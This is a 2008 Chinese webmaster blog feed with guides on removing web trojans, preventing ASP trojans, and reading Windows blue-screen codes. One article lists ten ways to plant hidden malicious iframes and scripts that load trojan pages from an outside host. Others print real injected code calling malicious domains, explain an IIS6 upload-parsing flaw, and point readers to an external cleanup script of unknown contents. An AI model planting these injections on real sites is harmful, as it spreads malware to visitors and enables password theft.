http://www.shangren.net/ zh-cn PBlog2 v2.4 http://www.shangren.net/images/logos.gif http://www.shangren.net/ 华夏商人网：站长学院 http://www.shangren.net/article/44.htm ziboren@yahoo.cn(admin) Thu,09 Oct 2008 14:54:31 +0800 http://www.shangren.net/default.asp?id=44 自动查找、自动清除网页51.la木马病毒及其他常见网页木马方法：
针对网站被植入js.users.51.la脚本的处理方法：下载virus.asp 文件，上传到你的网站空间的wwwroot根目录下，然后运行网址：  http://.**.**/virus.asp   即可。

virus.asp下载：  http://www.0533.tv/virus.rar

注意：下载解压后，上传到你的网站空间。
]]> http://www.shangren.net/article/43.htm ziboren@yahoo.cn(admin) Thu,09 Oct 2008 11:14:59 +0800 http://www.shangren.net/default.asp?id=43 如果你的网站一打开就显示一个程序正在安装到你的电脑上，并且网页上显示51.la的小标志，可以肯定地说，你的网页中了51.la木马，这个51.la病毒很难缠，不管静态页面，还是动态页面都能中招，并且每个页面都有，如图所示：



那怎么删除51.la木马？
用一般的卡巴、瑞星、江民、360安全卫士都找不到、也杀不死，因为他不是.exe木马，而是asp代码木马，现在教你怎么删除：把网站下载后，在网页文件asp  或js文件中找这段代码并删除 就可以了

document.writeln("<iframe src=\'http:\/\/www.eqw003.cn\/llsg\/44.htm\' width=100 height=0 frameborder=0><\/iframe>");
document.writeln("<script language=\'javascript\' src=\'http:\/\/js.users.51.la\/1598158.js\'><\/script>");
document.writeln("<script language=\'javascript\' src=\'http:\/\/www.eqw003.cn\/llsg\/44.htm\'> <\/script>");
注意网站程序打补丁，传说：51.la计数器已经成了网页木马传播平台，请大家注意。]]> http://www.shangren.net/article/42.htm ziboren@yahoo.cn(admin) Thu,09 Oct 2008 10:45:24 +0800 http://www.shangren.net/default.asp?id=42 　　由于ASP它本身是服务器提供的一贡服务功能，特别是最近由dvbbs的upfile文件出现漏洞以来，其高度的隐蔽性和难查杀性，对网站的安全造成了严重的威胁。因此针对ASP木马的防范和清除，为网管人员提出了更高的技术要求.
　　几个大的程序全部被发现存在上传漏洞，小程序更是不计其数，让asp木马一下占据了主流，得到广泛的使用，想必如果你是做服务器的话，一定为此头疼不止吧，特别是虚拟主机的用户都遇到过网页被篡改、数据被删除的经历，事后除了对这种行径深恶痛绝外，许多客户又苦于没有行之有效的防范措施。鉴于大部分网站入侵都是利用asp木马完成的，特写此文章以使普通虚拟主机用户能更好地了解、防范asp木马。也只有空间商和虚拟主机用户共同做好防范措施才可以有效防范asp木马!
　　我们首先来说一下怎么样防范好了，说到防范我们自然要对asp木马的原理了，大道理我也不讲了，网上的文章有的是，简单的说asp木马其实就是用asp编写的网站程序，甚至有些asp木马就是由asp网站管理程序修改而来的。就比如说我们常见的asp站长助手，等等
　　它和其他asp程序没有本质区别，只要是能运行asp的空间就能运行它，这种性质使得asp木马非常不易被发觉。它和其他asp程序的区别只在于asp木马是入侵者上传到目标空间，并帮助入侵者控制目标空间的asp程序。严重的从而获取服务器管理员的权限，要想禁止asp木马运行就等于禁止asp的运行，显然这是行不通的，这也是为什么asp木马猖獗的原因!有人要问了，是不是就没有办法了呢，不，有办法的：
　　第一：从源头入手，入侵者是怎么样上传asp木马的呢？一般哟几种方法，通过sql注射手段，获取管理员权限，通过备份数据库的功能将asp木马写入服务器。或者进入后台通过asp程序的上传功能的漏洞，上传木马等等，当然正常情况下，这些可以上传文件的asp程序都是有权限限制的，大多也限制了asp文件的上传。(比如：可以上传图片的新闻发布、图片管理程序，及可以上传更多类型文件的论坛程序等)，如果我们直接上传asp木马的话，我们会发现，程序会有提示，是不能直接上传的，但由于存在人为的asp设置错误及asp程序本身的漏洞，给了入侵者可乘之机，实现上传asp木马。
　　因此，防范asp木马的重点就在于虚拟主机用户如何确保自己空间中asp上传程序的安全上，如果你是用别人的程序的话，尽量用出名一点的大型一点的程序，这样漏洞自然就少一些，而且尽量使用最新的版本，并且要经常去官方网站查看新版本或者是最新补丁，还有就是那些数据库默认路径呀，管理员密码默认呀，一定要改，形成习惯保证程序的安全性。
　　那么如果你是程序员的话，我还想说的一点就是我们在网站程序上也应该尽量从安全的角度上编写涉及用户名与口令的程序最好封装在服务器端，尽量少的在ASP文件里出现，涉及到与数据库连接地用户名与口令应给予最小的权限; 需要经过验证的ASP页面，可跟踪上一个页面的文件名，只有从上一页面转进来的会话才能读取这个页面。防止ASP主页.inc文件泄露问题; 防止UE等编辑器生成some.asp.bak文件泄露问题等等特别是上传功能一定要特别注意
　　上面的只是对客户的一些要求，但是空间商由于无法预见虚拟主机用户会在自己站点中上传什么样的程序，以及每个程序是否存在漏洞，因此无法防止入侵者利用站点中客户程序本身漏洞上传asp木马的行为。空间商只能防止入侵者利用已被入侵的站点再次入侵同一服务器上其他站点的行为。这也更加说明要防范asp木马，虚拟主机用户就要对自己的程序严格把关! 为此我总结了ASP木马防范的十大原则供大家参考：
　　1、建议用户通过ftp来上传、维护网页，尽量不安装asp的上传程序。
　　2、对asp上传程序的调用一定要进行身份认证，并只允许信任的人使用上传程序。
　　这其中包括各种新闻发布、商城及论坛程序，只要可以上传文件的asp都要进行身份认证!
　　3、asp程序管理员的用户名和密码要有一定复杂性，不能过于简单，还要注意定期更换。
　　4、到正规网站下载asp程序，下载后要对其数据库名称和存放路径进行修改，数据库文件名称也要有一定复杂性。
　　5、要尽量保持程序是最新版本。
　　6、不要在网页上加注后台管理程序登陆页面的链接。
　　7、为防止程序有未知漏洞，可以在维护后删除后台管理程序的登陆页面，下次维护时再通过ftp上传即可。
　　8、要时常备份数据库等重要文件。
　　9、日常要多维护，并注意空间中是否有来历不明的asp文件。记住：一分汗水，换一分安全!
　　10、一旦发现被入侵，除非自己能识别出所有木马文件，否则要删除所有文件。
　　重新上传文件前，所有asp程序用户名和密码都要重置，并要重新修改程序数据库名称和存放路径以及后台管理程序的路径。
　　做好以上防范措施，您的网站只能说是相对安全了，决不能因此疏忽大意，因为入侵与反入侵是一场永恒的战争
]]> http://www.shangren.net/article/41.htm ziboren@yahoo.cn(admin) Thu,09 Oct 2008 10:42:58 +0800 http://www.shangren.net/default.asp?id=41 A。为什么好好的网站会有木马？
一般木马是来自ASP SHELL和PHP SHELL的程序段控制不严，程序上有上传功能，没有进行文件目录和文件后缀等的判断，一般这类的目录，以“海阳顶端网ASP木马”较为流行。
因2003平台IIS6原因，也存在目录名问题引起ASP木马。( 微软的IIS 6存在严重解析文件名错误
测试办法：在FTP中建立一个 test.asp 的文件夹，文件夹名就是 test.asp ，在这个文件夹中上传一个 hack.jpg，这个jpg的内容可以直接是，然后，用IE远程访问这个hack.jpg，你可以发现，它一样被当作是ASP文件来运行！显然，只要你的网站程序，允许用户自己建立文件夹及上传图片，黑客就可以上传图片来当作ASP木马来运行。
解决办法：所有使用星外虚拟主机管理平台的虚拟主机用户，可以在主机面板，设置执行权限选项中，直接将有上传权限的目录，取消ASP的运行权限，就可以解决这个问题。
可以参考其他公司的同类公告：
http://www.powereasy.net/Announce/3004.html(动易)
)
大家常用的动易2006和动网，BLOG这类的程序，需要详细的检查一下，并跟着开发者进行相应的安全程序升级。这样才能减少因代码原因引起的网站被黑。
B。网站被黑了，如何检查是那些网页有问题呢。
目前流行的网站被黑，是在相应的asp,htm,js等文件中，插入<iframe src=http://
这样的，需要使用查找程序来查找这类文件出来，手工删除此类插入的HTML代码。这项工作相对比较繁锁。需要仔细的查找。也会有一些木马是插入到js中，是以js调用方式的。更详细的资料，请看后部分E.挂马代码大全。
C。禁止写入和目录禁止执行的功能，二项功能组合，可以有效的防止ASP木马。这对于常被ASP木马影响的网站来说，会有一些帮助。
]]> http://www.shangren.net/article/40.htm ziboren@yahoo.cn(admin) Thu,09 Oct 2008 10:39:59 +0800 http://www.shangren.net/default.asp?id=40 一:框架挂马
<iframe src=地址 width=0 height=0></iframe>
二:js文件挂马
首先将以下代码
document.write("<iframe width='0' height='0' src='地址'></iframe>");
保存为xxx.js，
则JS挂马代码为
<script language=javascript src=xxx.js></script>
三:js变形加密
<SCRIPT language="JScript.Encode" src=http://www.xxx.com/muma.txt></script>
muma.txt可改成任意后缀
四:body挂马
<body ></body>
五:隐蔽挂马
top.document.body.innerHTML = top.document.body.innerHTML + '\r\n<iframe src="http://www.xxx.com/muma.htm/"></iframe>';
六:css中挂马
body {
background-image: url('javascript:document.write("<script src=http://www.XXX.net/muma.js></script>")')}
七:JAJA挂马
<SCRIPT language=javascript>
window.open ("地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1");
</script>
八:图片伪装
<html>
<iframe src="网马地址" height=0 width=0></iframe>
<img src="图片地址"></center>
</html>
九:伪装调用：
<frameset rows="444,0" cols="*">
<frame src="打开网页" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0">
<frame src="网马地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0">
</frameset>
十:高级欺骗
<a href="http://www.163.com(迷惑连接地址，显示这个地址指向木马地址)" > 页面要显示的内容 </a>
<SCRIPT Language="JavaScript">
function www_163_com ()
{
var url="网马地址";
open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10");
}
</SCRIPT>]]> http://www.shangren.net/article/39.htm ziboren@yahoo.cn(admin) Thu,09 Oct 2008 09:14:32 +0800 http://www.shangren.net/default.asp?id=39
几个大的程序全部被发现存在上传漏洞，小程序更是不计其数，让asp木马一下占据了主流，得到广泛的使用，想必如果你是做服务器的话，一定为此头疼不止吧，特别是虚拟主机的用户都遇到过网页被篡改、数据被删除的经历，事后除了对这种行径深恶痛绝外，许多客户又苦于没有行之有效的防范措施。鉴于大部分网站入侵都是利用asp木马完成的，特写此文章以使普通虚拟主机用户能更好地了解、防范asp木马。也只有空间商和虚拟主机用户共同做好防范措施才可以有效防范asp木马!

我们首先来说一下怎么样防范好了，说到防范我们自然要对asp木马的原理了，大道理我也不讲了，网上的文章有的是，简单的说asp木马其实就是用asp编写的网站程序，甚至有些asp木马就是由asp网站管理程序修改而来的。就比如说我们常见的asp站长助手，等等

它和其他asp程序没有本质区别，只要是能运行asp的空间就能运行它，这种性质使得asp木马非常不易被发觉。它和其他asp程序的区别只在于asp木马是入侵者上传到目标空间，并帮助入侵者控制目标空间的asp程序。严重的从而获取服务器管理员的权限，要想禁止asp木马运行就等于禁止asp的运行，显然这是行不通的，这也是为什么asp木马猖獗的原因!有人要问了，是不是就没有办法了呢，不，有办法的：

第一：从源头入手，入侵者是怎么样上传asp木马的呢？一般哟几种方法，通过sql注射手段，获取管理员权限，通过备份数据库的功能将asp木马写入服务器。或者进入后台通过asp程序的上传功能的漏洞，上传木马等等，当然正常情况下，这些可以上传文件的asp程序都是有权限限制的，大多也限制了asp文件的上传。(比如：可以上传图片的新闻发布、图片管理程序，及可以上传更多类型文件的论坛程序等)，如果我们直接上传asp木马的话，我们会发现，程序会有提示，是不能直接上传的，但由于存在人为的asp设置错误及asp程序本身的漏洞，给了入侵者可乘之机，实现上传asp木马。

因此，防范asp木马的重点就在于虚拟主机用户如何确保自己空间中asp上传程序的安全上，如果你是用别人的程序的话，尽量用出名一点的大型一点的程序，这样漏洞自然就少一些，而且尽量使用最新的版本，并且要经常去官方网站查看新版本或者是最新补丁，还有就是那些数据库默认路径呀，管理员密码默认呀，一定要改，形成习惯保证程序的安全性。

那么如果你是程序员的话，我还想说的一点就是我们在网站程序上也应该尽量从安全的角度上编写涉及用户名与口令的程序最好封装在服务器端，尽量少的在ASP文件里出现，涉及到与数据库连接地用户名与口令应给予最小的权限; 需要经过验证的ASP页面，可跟踪上一个页面的文件名，只有从上一页面转进来的会话才能读取这个页面。防止ASP主页.inc文件泄露问题; 防止UE等编辑器生成some.asp.bak文件泄露问题等等特别是上传功能一定要特别注意

上面的只是对客户的一些要求，但是空间商由于无法预见虚拟主机用户会在自己站点中上传什么样的程序，以及每个程序是否存在漏洞，因此无法防止入侵者利用站点中客户程序本身漏洞上传asp木马的行为。空间商只能防止入侵者利用已被入侵的站点再次入侵同一服务器上其他站点的行为。这也更加说明要防范asp木马，虚拟主机用户就要对自己的程序严格把关! 为此我总结了ASP木马防范的十大原则供大家参考：

1、建议用户通过ftp来上传、维护网页，尽量不安装asp的上传程序。

2、对asp上传程序的调用一定要进行身份认证，并只允许信任的人使用上传程序。

这其中包括各种新闻发布、商城及论坛程序，只要可以上传文件的asp都要进行身份认证!

3、asp程序管理员的用户名和密码要有一定复杂性，不能过于简单，还要注意定期更换。

4、到正规网站下载asp程序，下载后要对其数据库名称和存放路径进行修改，数据库文件名称也要有一定复杂性。建议我公司的客户使用数据库文件扩展名，因为我公司服务器设置了.mdb文件防下载功能。

5、要尽量保持程序是最新版本。

6、不要在网页上加注后台管理程序登陆页面的链接。

7、为防止程序有未知漏洞，可以在维护后删除后台管理程序的登陆页面，下次维护时再通过ftp上传即可。

8、要时常备份数据库等重要文件。

9、日常要多维护，并注意空间中是否有来历不明的asp文件。记住：一分汗水，换一分安全!

10、一旦发现被入侵，除非自己能识别出所有木马文件，否则要删除所有文件。

重新上传文件前，所有asp程序用户名和密码都要重置，并要重新修改程序数据库名称和存放路径以及后台管理程序的路径。

做好以上防范措施，您的网站只能说是相对安全了，决不能因此疏忽大意，因为入侵与反入侵是一场永恒的战争!
]]> http://www.shangren.net/article/38.htm ziboren@yahoo.cn(admin) Thu,09 Oct 2008 09:10:35 +0800 http://www.shangren.net/default.asp?id=38
现在放这些病毒的破坏者只是在网站的主页或conn.asp文件中加入iframe代码，想利用网站，使访问者的浏览器下载他们的恶意代码，然后他们在访问者的机上搞破坏，如偷游戏密码、偷盗QQ号码、盗取网上银行密码等等等。

应对方案：

对普通用户来说，只要安装了先进的杀毒软件，访问这个网站就会报警，报告发现某某病毒，然后杀除病毒。以瑞星为例，需要将病毒库升级到18.51.41以上版本。同时要下载安装最新的IE补丁，建议在网络不拥挤的早上进行可行性的升级。还有，需要用杀毒软件杀除在缓存中的病毒，清空缓存，这样就可以防范这类木马病毒了。木马克星，反间谍专家等木马专杀软件也可以配合已有的杀病毒软件进行工作。

对二级网站用户来说，根据病毒特点，需要仔细进行首页代码的查询，可以发现index.htm或者default.asp，index.asp这类首页文件修改日期为06.10.28，其页面末尾一般有以下代码：

<iframe src="http://www.17hk.com/ziliao/alexa.asp" width="0" height="0" frameborder="0"></iframe>

这就是病毒嵌入的类似广告的插入代码，网页启动时，这个链接网站随即启动，并启动其恶意代码对有IE漏洞的本地用户进行木马植入或者侵害。解决办法就是清除掉它，重新覆盖上传即可。

少数静态网页还可能被嵌入了不明的script代码（实际上也是病毒执行脚本），这也需要有经验的二级网站维护者仔细检查并加以清除。

二级网站用户维护须知：

目前，网络中心已将所有home服务器上的二级网站首页做了初步检查，清除了部分嵌入代码，并将服务器进行了适当升级。

网络中心在这里提醒各二级网站维护者，随着当前病毒特别是木马病毒的进展，除了要保证网站内容的安全性外，还要格外注意网站代码的安全性，尤其是套用不明的外部代码的时候，必须保证对源代码进行审查，不公开的代码模块原则上不能采用。再发现带有木马代码的网站，原则上，网络中心将停止其主页发布，取消主页空间。也希望各二级单位积极配合网络中心，对网站进一步做自查工作，以提高网站安全性。
Spy Sweeper，专杀木马、间谍、恶意程序，还可实时监控]]> http://www.shangren.net/article/36.htm ziboren@yahoo.cn(admin) Thu,02 Oct 2008 09:52:27 +0800 http://www.shangren.net/default.asp?id=36
1、故障检查信息
***STOP 0x0000001E(0xC0000005,0xFDE38AF9,0x0000001,0x7E8B0EB4)
KMODE_EXCEPTION_NOT_HANDLED ***其中错误的第一部分是停机码(Stop Code)也就是STOP 0x0000001E, 用于识别已发生错误的类型, 错误第二部分是被括号括起来的四个数字集, 表示随机的开发人员定义的参数(这个参数对于普通用户根本无法理解, 只有驱动程序编写者或者微软操作系统的开发人员才懂). 第三部分是错误名. 信息第一行通常用来识别生产错误的驱动程序或者设备. 这种信息多数很简洁, 但停机码可以作为搜索项在微软知识库和其他技术资料中使用

2.推荐操作
蓝屏第二部分是推荐用户进行的操作信息. 有时, 推荐的操作仅仅是一般性的建议(比如: 到销售商网站查找BIOS的更新等); 有时, 也就是显示一条与当前问题相关的提示. 一般来说, 惟一的建议就是重启.

3.调试端口告诉用户内存转储映像是否写到磁盘商了, 使用内存转储映像可以确定发生问题的性质, 还会告诉用户调试信息是否被传到另一台电脑商, 以及使用了什么端口完成这次通讯. 不过, 这里的信息对于普通用户来说, 没有什么意义.有时保卫科可以顺利的查到是哪个生产小组的问题, 会在第一部分明确报告是哪个文件犯的错, 但常常它也只能查个大概范围, 而无法明确指明问题所在. 由于工厂全面被迫停止, 只有重新整顿开工, 有时, 那个生产小组会意识到错误 , 不再重犯. 但有时仍然会试图哄抢零件, 于是厂领导不得不重复停工决定(不能启动并显示蓝屏信息, 或在进行相同操作时再次出现蓝屏).

二、蓝屏的处理方法

Windows 2K/XP蓝屏信息非常多, 无法在一篇文章中全面讲解, 但他们产生的原因往往集中在不兼容的硬件和驱动程序、有问题的软件、病毒等, 因此首先为大家提供了一些常规的解决方案, 在遇到蓝屏错误时, 应先对照这些方案进行排除.
1.重启
有时只是某个程序或驱动程序一时犯错, 重启后他们会改过自新.(注意:此时参见7.查询停机码)
2.新硬件
首先, 应该检查新硬件是否插牢, 这个被许多人忽视的问题往往会引发许多莫名其妙的故障. 如果确认没有问题, 将其拔下, 然后换个插槽试试, 并安装最新的驱动程序. 同时还应对照微软网站的硬件兼容类别检查一下硬件是否与操作系统兼容. 如果你的硬件没有在表中, 那么就得到硬件厂商网站进行查询, 或者拨打他们的咨询电话.
Windows XP的硬件兼容列表
Windows 2K的硬件兼容类别

3.新驱动和新服务
如果刚安装完某个硬件的新驱动, 或安装了某个软件, 而它又在系统服务中添加了相应项目(比如:杀毒软件、CPU降温软件、防火墙软件等), 在重启或使用中出现了蓝屏故障, 请到安全模式来卸载或禁用它们.

4.检查病毒
比如冲击波和振荡波等病毒有时会导致Windows蓝屏死机, 因此查杀病毒必不可少. 同时一些木马间谍软件也会引发蓝屏, 所以最好再用相关工具进行扫描检查.

5.检查BIOS和硬件兼容性
对于新装的电脑经常出现蓝屏问题, 应该检查并升级BIOS到最新版本, 同时关闭其中的内存相关项, 比如:缓存和映射. 另外, 还应该对照微软的硬件兼容列表检查自己的硬件. 还有就是, 如果主板BIOS无法支持大容量硬盘也会导致蓝屏, 需要对其进行升级.

小提示:
BIOS的缓存和映射项
Video BIOS Shadowing (视频BIOS映射)
Shadowing address ranges(映射地址列)
System BIOS Cacheable(系统BIOS缓冲)
Video BIOS Cacheable(视频BIOS缓冲)
Video RAM Cacheable(视频内存缓冲)
6.检查系统日志
在开始-->菜单中输入:EventVwr.msc, 回车出现"事件查看器", 注意检查其中的"系统日志"和"应用程序日志"中表明"错误"的项.

7.查询停机码
把蓝屏中密密麻麻的E文记下来, 接着到其他电脑中上网, 进入微软帮助与支持网站http://support.microsoft.com?, 在左上角的"搜索(知识库)"中输入停机码, 如果搜索结果没有适合信息, 可以选择"英文知识库"在搜索一遍. 一般情况下, 会在这里找到有用的解决案例. 另外, 在baidu、Google等搜索引擎中使用蓝屏的停机码或者后面的说明文字为关键词搜索, 往往也会有以外的收获.

8.最后一次正确配置
一般情况下, 蓝屏都出现于更新了硬件驱动或新加硬件并安装其驱动后, 这时Windows 2K/XP提供的"最后一次正确配置"就是解决蓝屏的快捷方式. 重启系统, 在出现启动菜单时按下F8键就会出现高级启动选项菜单, 接着选择"最后一次正确配置".

9.安装最新的系统补丁和Service Pack
有些蓝屏是Windows本身存在缺陷造成的, 应此可通过安装最新的系统补丁和Service Pack来解决.

三、蓝屏代码含义和解决方案

1、0x0000000A:IRQL_NOT_LESS_OR_EQUAL
◆错误分析:主要是由问题的驱动程序、有缺陷或不兼容的硬件与软件造成的. 从技术角度讲. 表明在内核模式中存在以太高的进程内部请求级别(IRQL)访问其没有权限访问的内存地址.
◇解决方案:请用前面介绍的解决方案中的2、3、5、8、9方案尝试排除.

2、0x00000012:TRAP_CAUSE_UNKNOWN
◆错误分析:如果遇到这个错误信息, 那么很不幸, 应为KeBudCheck分析的结果是错误原因
未知.
◇解决方案:既然微软都帮不上忙, 就得靠自己了, 请仔细回想这个错误是什么时候出现的; 第一次发生时你对系统做了哪些操作; 发生时正在进行什么操作. 从这些信息中找出可能的原因, 从而选择相应解决方案尝试排除.

3、0x0000001A:MEMORY_MANAGEMENT
◆错误分析:这个内存管理错误往往是由硬件引起的, 比如: 新安装的硬件、内存本身有问题等.
◇解决方案:如果是在安装Windows时出现, 有可能是由于你的电脑达不到安装Windows的最小内存和磁盘要求.

4、0x0000001E:KMODE_EXCEPTION_NOT_HANDLED
◆错误分析:Windows内核检查到一个非法或者未知的进程指令, 这个停机码一般是由问题的内存或是与前面0x0000000A相似的原因造成的.
◇解决方案:
(1)硬件兼容有问题:请对照前面提到的最新硬件兼容性列表, 查看所有硬件是否包含在该列表中.
(2)有问题的设备驱动、系统服务或内存冲突和中断冲突: 如果在蓝屏信息中出现了驱动程序的名字, 请试着在安装模式或者故障恢复控制台中禁用或删除驱动程序, 并禁用所有刚安装的驱动和软件. 如果错误出现在系统启动过程中, 请进入安全模式, 将蓝屏信息中所标明的文件重命名或者删除.
(3)如果错误信息中明确指出Win32K.sys: 很有可能是第三方远程控制软件造成的, 需要从故障恢复控制台中将对该软件的服务关闭.
(4)在安装Windows后第一次重启时出现:最大嫌疑可能时系统分区的磁盘空间不足或BIOS兼容有问题.
(5)如果是在关闭某个软件时出现的:很有可能时软件本省存在设计缺陷, 请升级或卸载它.

5、0x00000023:FAT_FILE_SYSTEM
0x00000024:NTFS_FILE_SYSTEM
◆错误分析:0x00000023通常发生在读写FAT16或者FAT32文件系统的系统分区时, 而
0x00000024则是由于NTFS.sys文件出现错误(这个驱动文件的作用是容许系统读写使用
NTFS文件系统的磁盘). 这两个蓝屏错误很有可能是磁盘本身存在物理损坏, 或是中断要求封包(IRP)损坏而导致的. 其他原因还包括:硬盘磁盘碎片过多; 文件读写操作过于频繁, 并且数据量非常达或者是由于一些磁盘镜像软件或杀毒软件引起的.
◇解决方案:
第一步:首先打开命令行提示符, 运行"Chkdsk /r"(注:不是CHKDISK, 感觉象这个, 但是……)命令检查并修复硬盘错误, 如果报告存在怀道(Bad Track), 请使用硬盘厂商提供的检查工具进行检查和修复.
第二步:接着禁用所有即使扫描文件的软件, 比如:杀毒软件、防火墙或备份工具.
第三步:右击C:\winnt\system32\drivers\fastfat.sys文件并选择"属性", 查看其版本是否与当前系统所使用的Windows版本相符.(注:如果是XP, 应该是C:\windows\system32
\drivers\fastfat.sys)
第四步:安装最新的主板驱动程序, 特别IDE驱动. 如果你的光驱、可移动存储器也提供有驱动程序, 最好将它们升级至最新版.

6、0x00000027:RDR_FILE_SYSTEM
◆错误分析:这个错误产生的原因很难判断, 不过Windows内存管理出了问题很可能会导致这个停机码的出现.
◇解决方案:如果是内存管理的缘故, 通常增加内存会解决问题.

7、0x0000002EATA_BUS_ERROR
◆错误分析:系统内存存储器奇偶校验产生错误, 通常是因为有缺陷的内存(包括物理内存、二级缓存或者显卡显存)时设备驱动程序访问不存在的内存地址等原因引起的. 另外, 硬盘被病毒或者其他问题所损伤, 以出现这个停机码.
◇解决方案:
(1)检查病毒
(2)使用"chkdsk /r"命令检查所有磁盘分区.
(3)用Memtest86等内存测试软件检查内存.
(4)检查硬件是否正确安装, 比如:是否牢固、金手指是否有污渍.

8、0x00000035:NO_MORE_IRP_STACK_LOCATIONS
◆错误分析:从字面上理解, 应该时驱动程序或某些软件出现堆栈问题. 其实这个故障的真正原因应该时驱动程序本省存在问题, 或是内存有质量问题.
◇解决方案:请使用前面介绍的常规解决方案中与驱动程序和内存相关的方案进行排除.

9、0x0000003F:NO_MORE_SYSTEM_PTES
◆错误分析:一个与系统内存管理相关的错误, 比如:由于执行了大量的输入/输出操作, 造成内存管理出现问题: 有缺陷的驱动程序不正确地使用内存资源; 某个应用程序(比如:备份软件)被分配了大量的内核内存等.
◇解决方案:卸载所有最新安装的软件(特别是哪些增强磁盘性能的应用程序和杀毒软件)和驱动程序.

10、0x00000044:MULTIPLE_IRP_COMPLIETE_REQUESTS
◆错误分析:通常是由硬件驱动程序引起的.
◇解决方案:卸载最近安装的驱动程序. 这个故障很少出现, 目前已经知道的是, 在使用
www.in-system.com/这家公司的某些软件时会出现, 其中的罪魁就是Falstaff.sys文件.(作者难道不怕吃官司嘛, 把公司网址公布)

11、0x00000050: PAGE_FAULT_IN_NONPAGED+AREA
◆错误分析:有问题的内存(包括屋里内存、二级缓存、显存)、不兼容的软件(主要是远程控制和杀毒软件)、损坏的NTFS卷以及有问题的硬件(比如: PCI插卡本身已损坏)等都会引发这个错误.
◇解决方案:请使用前面介绍的常规解决方案中与内存、软件、硬件、硬盘等相关的方案进
行排除.

12、0x00000051:REGISTRY_ERROR
◆错误分析:这个停机码说明注册表或系统配置管理器出现错误, 由于硬盘本身有物理损坏或文件系统存在问题, 从而造成在读取注册文件时出现输入/输出错误.
◇解决方案:使用"chkdsk /r"检查并修复磁盘错误.

13、0x00000058:FTDISK_INTERNAL_ERROR
◆错误分析:说明在容错集的主驱动发生错误.
◇解决方案:首先尝试重启电脑看是否能解决问题, 如果不行, 则尝试"最后一次正确配置"进行解决.

14、0x0000005E:CRITICAL_SERVICE_FAILED
◆错误分析:某个非常重要的系统服务启动识别造成的.
◇解决方案:如果是在安装了某个新硬件后出新的, 可以先移除该硬件, 并通过网上列表检查它是否与Windows 2K/XP兼容, 接着启动电脑, 如果蓝屏还是出现, 请使用"最后一次正确配置"来启动Windows, 如果这样还是失败, 建议进行修复安装或是重装.

15、0x0000006F:SESSION3_INITIALIZATION-FAILED
◆错误分析:这个错误通常出现在Windows启动时, 一般是由有问题的驱动程序或损坏的系统文件引起的.
◇解决方案:建议使用Windows安装光盘对系统进行修复安装.

16、0x00000076ROCESS_HAS_LOCKED_PAGES
◆错误分析:通常是因为某个驱动程序在完成了一次输入/输出操作后, 没有正确释放所占有的内存
◇解决方案:
第一步:点击开始-->运行:regedt32, 找到[HKLM\SYSTEM\Currentcontrol set\control\session manager\memory management], 在右侧新建双字节值"TrackLockedPages", 值为1. 这样Windows便会在错误再次出现时跟踪到是哪个驱动程序的问题.第二步:如果再次出现蓝屏, 那么错误信息会变成:STOP:0x0000000CB(0xY,0xY,0xY,0xY)DRIVER_LEFT_LOCKED_PAGES_IN_PROCESS其中第四个"0xY"会显示为问题驱动程序的名字, 接着对其进行更新或删除.第三步:进入注册表, 删除添加的"TrackLockedPages".

17、0x00000077:KERNEL_STACK_INPAGE_ERROR
◆错误分析:说明需要使用的内核数据没有在虚拟内存或物理内存中找到. 这个错误常常于是着磁盘有问题, 相应数据损坏或受到病毒侵蚀.
◇解决方案:使用杀毒软件扫描系统; 使用"chkdsk /r"命令检查并修复磁盘错误, 如不行则使用磁盘厂商提供的工具检查修复.

18、0x0000007A:KERNEL_DATA_INPAGE_ERROR
◆错误分析:这个错误往往是虚拟内存中的内核数据无法读入内存造成的. 原因可能是虚拟内存页面文件中存在坏簇、病毒、磁盘控制器出错、内存有问题.
◇解决方案:首先用升级为最新病毒库杀毒软件查杀病毒, 如果促无信息中还0xC000009C
或0xC000016A代码, 那么表示是坏簇造成的, 并且系统的磁盘检测工具无法自动修复, 这时要进入"故障恢复控制台", 用"chkdsk /r"命令进行手动修复.

19、0x0000007B:INACESSIBLE_BOOT_DEVICE
◆错误分析:Windows在启动过程中无法访问系统分区或启动卷. 一般发生在更换主板后第一次启动时, 主要是因为新主板和旧主板的IDE控制器使用了不同芯片组造成的. 有时也可能是病毒或硬盘损伤所引起的.
◇解决方案:一般只要用安装光盘启动电脑, 然后执行修复安装即可解决问题. 对于病毒则可使用DOS版的杀毒软件进行查杀(主战有kv2005DOS版下载). 如果是硬盘本身存在问题, 请将其安装到其他电脑中, 然后使用"chkdsk /r"来检查并修复磁盘错误.

20、0x0000007E:SYSTEM_THREAD_EXCEPTION_NOT_HANDLED
◆错误分析:系统进程产生错误, 但Windows错误处理器无法捕获. 其产生原因很多, 包括:硬件兼容性、有问题的驱动程序或系统服务、 或者是某些软件.
◇解决方案:请使用"事件查看器"来获取更多的信息, 从中发现错误根源.(发现好像不是解决哦, 看来这里大家要自力更生了!)


21、0x0000007F:UNEXPECTED_KERNEL_MOED_TRAP
◆错误分析:一般是由于有问题的硬件(比如:内存)或某些软件引起的. 有时超频也会产生这个错误.
◇解决方案:用检测软件(比如:Memtest86)检查内存, 如果进行了超频, 请取消超频. 将PCI硬件插卡从主板插槽拔下来, 或更换插槽. 另外, 有些主板(比如:nForce2主板)在进行超频后, 南桥芯片过热也会导致蓝屏, 此时为该芯片单独增加散热片往往可以有效解决问题.

22、0x00000080:NMI_HARDWARE_FAILURE
◆错误分析:通常是有硬件引起的.(似乎蓝屏与硬件错误有不解之缘)
◇解决方案:如果最近安装了新硬件, 请将其移除, 然后试试更换插槽和安装最新的驱动程序, 如果升级了驱动程序, 请恢复后原来的版本; 检查内存金手指是否有污染和损坏; 扫描病毒; 运行"chkdsk /r"检查并修复磁盘错误; 检查所有硬件插卡已经插牢. 如果以上尝试都无效果, 就得找专业的电脑维修公司请求帮助了.

23、0x0000008E:KERNEL_MODE_EXCEPTION_NOT_HANDLED
◆错误分析:内核级应用程序产生了错误, 但Windows错误处理器没有捕获. 通常是硬件兼容性错误.
◇解决方案:升级驱动程序或升级BIOS.

24、0x0000009C:MACHINE_CHECK_EXCEPTION
◆错误分析:通常是硬件引起的. 一般是因为超频或是硬件存在问题(内存、CPU、总线、电
源).
◇解决方案:如果进行了超频, 请降会CPU原来频率, 检查硬件.

25、0x0000009FRIVER_POWER_STATE_FAILURE
